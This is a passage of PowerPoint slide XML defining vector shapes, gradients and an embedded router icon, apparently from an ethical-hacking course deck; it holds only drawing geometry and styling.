                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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95" name="Freeform 1789"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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96" name="Freeform 1790"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBez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97" name="Freeform 1791"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2440" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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98" name="Oval 1792"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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86" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256.png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12140" y="2804699"/>
                <a:ext cx="438568" cy="43856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287" name="Group 468"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3364743" y="2991206"/>
                <a:ext cx="355600" cy="187325"/>
                <a:chOff x="5063" y="-2464"/>
                <a:chExt cx="1810" cy="954"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="288" name="Freeform 469"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5063" y="-2464"/>
                  <a:ext cx="1810" cy="486"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1810"/>
                    <a:gd name="T1" fmla="*/ 120 h 486"/>
                    <a:gd name="T2" fmla="*/ 451 w 1810"/>
                    <a:gd name="T3" fmla="*/ 0 h 486"/>
                    <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                    <a:gd name="T5" fmla="*/ 363 h 486"/>
                    <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                    <a:gd name="T7" fmla="*/ 486 h 486"/>
                    <a:gd name="T8" fmla="*/ 0 w 1810"/>
                    <a:gd name="T9" fmla="*/ 120 h 4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10" h="486">
                      <a:moveTo>
                        <a:pt x="0" y="120"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="451" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1810" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1358" y="486"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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89" name="Freeform 470"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5063" y="-2344"/>
                  <a:ext cx="1358" cy="834"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1358"/>
                    <a:gd name="T1" fmla="*/ 0 h 834"/>
                    <a:gd name="T2" fmla="*/ 0 w 1358"/>
                    <a:gd name="T3" fmla="*/ 470 h 834"/>
                    <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                    <a:gd name="T5" fmla="*/ 834 h 834"/>
                    <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                    <a:gd name="T7" fmla="*/ 366 h 834"/>
                    <a:gd name="T8" fmla="*/ 0 w 1358"/>
                    <a:gd name="T9" fmla="*/ 0 h 8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8" h="834">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1358" y="834"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1358" y="36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90" name="Freeform 471"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6421" y="-2101"/>
                  <a:ext cx="452" cy="591"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 452"/>
                    <a:gd name="T1" fmla="*/ 591 h 591"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 123 h 591"/>
                    <a:gd name="T4" fmla="*/ 452 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 591"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 470 h 591"/>
                    <a:gd name="T8" fmla="*/ 0 w 452"/>
                    <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                      <a:moveTo>
                        <a:pt x="0" y="591"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="59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91" name="Freeform 472"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-2249"/>
                  <a:ext cx="322" cy="415"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 322"/>
                    <a:gd name="T1" fmla="*/ 0 h 415"/>
                    <a:gd name="T2" fmla="*/ 0 w 322"/>
                    <a:gd name="T3" fmla="*/ 330 h 415"/>
                    <a:gd name="T4" fmla="*/ 322 w 322"/>
                    <a:gd name="T5" fmla="*/ 415 h 415"/>
                    <a:gd name="T6" fmla="*/ 322 w 322"/>
                    <a:gd name="T7" fmla="*/ 85 h 415"/>
                    <a:gd name="T8" fmla="*/ 0 w 322"/>
                    <a:gd name="T9" fmla="*/ 0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2" h="415">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="322" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="322" y="8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92" name="Freeform 473"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5578" y="-2122"/>
                  <a:ext cx="319" cy="416"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 319"/>
                    <a:gd name="T1" fmla="*/ 0 h 416"/>
                    <a:gd name="T2" fmla="*/ 0 w 319"/>
                    <a:gd name="T3" fmla="*/ 331 h 416"/>
                    <a:gd name="T4" fmla="*/ 319 w 319"/>
                    <a:gd name="T5" fmla="*/ 416 h 416"/>
                    <a:gd name="T6" fmla="*/ 319 w 319"/>
                    <a:gd name="T7" fmla="*/ 85 h 416"/>
                    <a:gd name="T8" fmla="*/ 0 w 319"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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416">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="319" y="416"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="319" y="8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93" name="Freeform 474"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6036" y="-1994"/>
                  <a:ext cx="319" cy="415"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 319"/>
                    <a:gd name="T1" fmla="*/ 0 h 415"/>
                    <a:gd name="T2" fmla="*/ 0 w 319"/>
                    <a:gd name="T3" fmla="*/ 330 h 415"/>
                    <a:gd name="T4" fmla="*/ 319 w 319"/>
                    <a:gd name="T5" fmla="*/ 415 h 415"/>
                    <a:gd name="T6" fmla="*/ 319 w 319"/>
                    <a:gd name="T7" fmla="*/ 85 h 415"/>
                    <a:gd name="T8" fmla="*/ 0 w 319"/>
                    <a:gd name="T9" fmla="*/ 0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415">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="330"/>
